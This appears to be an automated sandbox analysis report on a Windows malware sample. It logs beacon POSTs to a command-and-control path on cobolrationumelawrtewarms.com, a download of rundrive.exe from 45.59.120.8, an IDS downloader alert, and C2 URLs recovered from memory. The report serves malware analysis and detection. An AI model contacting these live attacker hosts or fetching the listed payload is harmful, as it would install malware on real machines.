Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 43 32 42 45 39 45 34 34 41 34 37 46 31 33 44 35 34 38 37 32 35 42 32 37 37 46 44 30 45 39 31 31 43 38 41 43 39 31 37 42 39 30 33 35 35 31 38 46 31 46 34 45 43 32 42 35 31 43 46 41 44 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9C2BE9E44A47F13D548725B277FD0E911C8AC917B9035518F1F4EC2B51CFAD
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View

IP Address: 107.189.27.66 107.189.27.66

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 45.59.120.8:80

Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

Code function: 0_2_0008C3B0 InternetCloseHandle,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep,

0_2_0008C3B0

Source: global traffic

HTTP traffic detected: GET /files/catlogs/rundrive.exe HTTP/1.1Host: 45.59.120.8

Source: global traffic	DNS traffic detected: DNS query: cobolrationumelawrtewarms.com
Source: global traffic	DNS traffic detected: DNS query: towerbingobongoboom.com
Source: global traffic	DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.php
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.php:
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpDa
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpPRF
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpPr
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpSOn
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpb
Source: Gxtuum.exe, 00000001.00000002.4538930866.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpjY
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpl
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpwe
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpz
Source: Gxtuum.exe, 00000001.00000002.4538930866.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpzi
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.59.120.8/files/catlogs/rundrive.exe
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.59.120.8/files/catlogs/rundrive.exe6
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.4538930866.0000000001424000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php&
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php6l
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php7m
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpFm
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001424000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpV?
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpY
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpe
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phphl
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpi
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpiYl
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpim
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpir
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpx
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001478000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpxm
